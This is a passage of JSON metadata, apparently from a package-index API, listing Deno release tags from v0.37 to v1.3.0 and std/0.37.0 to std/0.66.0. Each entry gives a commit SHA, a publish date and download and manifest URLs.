_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.